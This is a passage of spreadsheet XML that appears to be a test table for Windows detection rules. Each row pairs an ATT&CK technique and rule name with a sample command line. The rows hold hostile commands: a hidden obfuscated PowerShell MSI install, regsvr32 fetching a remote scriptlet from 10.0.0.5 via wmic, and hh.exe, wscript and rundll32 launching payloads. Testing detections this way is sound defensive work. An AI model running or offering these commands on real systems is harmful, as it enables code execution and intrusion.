    </row>
    <row r="955" ht="15.75" customHeight="1" s="42">
      <c r="A955" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B955" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C955" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D955" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E955" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WiNDOwSTYlE Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F955" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G955" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H955" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I955" s="43" t="n"/>
      <c r="J955" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K955" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="956" ht="15.75" customHeight="1" s="42">
      <c r="A956" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B956" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C956" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D956" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E956" s="44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956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I956" s="43" t="n"/>
      <c r="J956" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K956" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="957" ht="15.75" customHeight="1" s="42">
      <c r="A957" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B957" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C957" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D957" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E957" s="43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957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I957" s="43" t="n"/>
      <c r="J957" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K957" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="958" ht="15.75" customHeight="1" s="42">
      <c r="A958" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B958" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C958" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D958" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E958" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I958" s="43" t="n"/>
      <c r="J958" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K958" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="959" ht="15.75" customHeight="1" s="42">
      <c r="A959" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B959" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C959" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D959" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E959" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I959" s="44" t="n"/>
      <c r="J959" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K959" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="960" ht="15.75" customHeight="1" s="42">
      <c r="A960" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B960" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C960" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D960" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E960" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I960" s="44" t="n"/>
      <c r="J960" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K960" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="961" ht="15.75" customHeight="1" s="42">
      <c r="A961" s="43" t="n"/>
      <c r="B961" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C961" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D961" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E961" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I961" s="43" t="n"/>
      <c r="J961" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K961" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="962" ht="15.75" customHeight="1" s="42">
      <c r="A962" s="43" t="n"/>
      <c r="B962" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C962" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D962" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E962" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I962" s="44" t="n"/>
      <c r="J962" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K962" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="963" ht="15.75" customHeight="1" s="42">
      <c r="A963" s="43" t="n"/>
      <c r="B963" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C963" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D963" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E963" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I963" s="43" t="n"/>
      <c r="J963" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K963" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="964" ht="15.75" customHeight="1" s="42">
      <c r="A964" s="43" t="n"/>
      <c r="B964" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C964" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D964" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E964" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I964" s="43" t="n"/>
      <c r="J964" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K964" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="965" ht="15.75" customHeight="1" s="42">
      <c r="A965" s="43" t="n"/>
      <c r="B965" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C965" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D965" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E965" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nOloGo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I965" s="43" t="n"/>
      <c r="J965" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K965" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="966" ht="15.75" customHeight="1" s="42">
      <c r="A966" s="43" t="n"/>
      <c r="B966" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C966" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D966" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E966" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I966" s="43" t="n"/>
      <c r="J966" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K966" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="967" ht="15.75" customHeight="1" s="42">
      <c r="A967" s="43" t="n"/>
      <c r="B967" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C967" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D967" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E967" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I967" s="43" t="n"/>
      <c r="J967" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K967" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="968" ht="15.75" customHeight="1" s="42">
      <c r="A968" s="43" t="n"/>
      <c r="B968" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C968" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D968" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E968" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I968" s="43" t="n"/>
      <c r="J968" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K968" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="969" ht="15.75" customHeight="1" s="42">
      <c r="A969" s="44" t="n"/>
      <c r="B969" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C969" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D969" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E969" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /u"</t>
        </is>
      </c>
      <c r="F969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I969" s="43" t="n"/>
      <c r="J969" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K969" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="970" ht="15.75" customHeight="1" s="42">
      <c r="A970" s="44" t="n"/>
      <c r="B970" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C970" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D970" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E970" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I970" s="43" t="n"/>
      <c r="J970" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K970" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="971" ht="15.75" customHeight="1" s="42">
      <c r="A971" s="44" t="n"/>
      <c r="B971" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C971" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D971" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E971" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I971" s="43" t="n"/>
      <c r="J971" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K971" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="972" ht="15.75" customHeight="1" s="42">
      <c r="A972" s="44" t="n"/>
      <c r="B972" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C972" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D972" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E972" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I972" s="43" t="n"/>
      <c r="J972" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K972" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="973" ht="15.75" customHeight="1" s="42">
      <c r="A973" s="44" t="n"/>
      <c r="B973" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C973" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D973" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E973" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I973" s="44" t="n"/>
      <c r="J973" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K973" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="974" ht="15.75" customHeight="1" s="42">
      <c r="A974" s="44" t="n"/>
      <c r="B974" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C974" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D974" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E974" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" /N /u"</t>
        </is>
      </c>
      <c r="F974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I974" s="44" t="n"/>
      <c r="J974" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K974" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="975" ht="15.75" customHeight="1" s="42">
      <c r="A975" s="44" t="n"/>
      <c r="B975" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C975" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D975" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E975" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I975" s="44" t="n"/>
      <c r="J975" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K975" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="976" ht="15.75" customHeight="1" s="42">
      <c r="A976" s="44" t="n"/>
      <c r="B976" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C976" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D976" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E976" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I976" s="44" t="n"/>
      <c r="J976" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K976" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="977" ht="15.75" customHeight="1" s="42">
      <c r="A977" s="44" t="n"/>
      <c r="B977" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C977" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D977" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E977" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I977" s="44" t="n"/>
      <c r="J977" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K977" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="978" ht="15.75" customHeight="1" s="42">
      <c r="A978" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B978" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C978" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D978" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E978" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I978" s="43" t="n"/>
      <c r="J978" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K978" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="979" ht="15.75" customHeight="1" s="42">
      <c r="A979" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B979" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C979" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D979" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E979" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I979" s="44" t="n"/>
      <c r="J979" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K979" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="980" ht="15.75" customHeight="1" s="42">
      <c r="A980" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B980" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C980" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D980" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E980" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I980" s="44" t="n"/>
      <c r="J980" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K980" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="981" ht="15.75" customHeight="1" s="42">
      <c r="A981" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B981" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C981" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D981" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E981" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I981" s="44" t="n"/>
      <c r="J981" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K981" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="982" ht="15.75" customHeight="1" s="42">
      <c r="A982" s="43" t="n"/>
      <c r="B982" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C982" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D982" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E982" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; tmp.bat"</t>
        </is>
      </c>
      <c r="F982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I982" s="43" t="n"/>
      <c r="J982" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K982" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="983" ht="15.75" customHeight="1" s="42">
      <c r="A983" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B983" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C983" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D983" s="44" t="inlineStr">
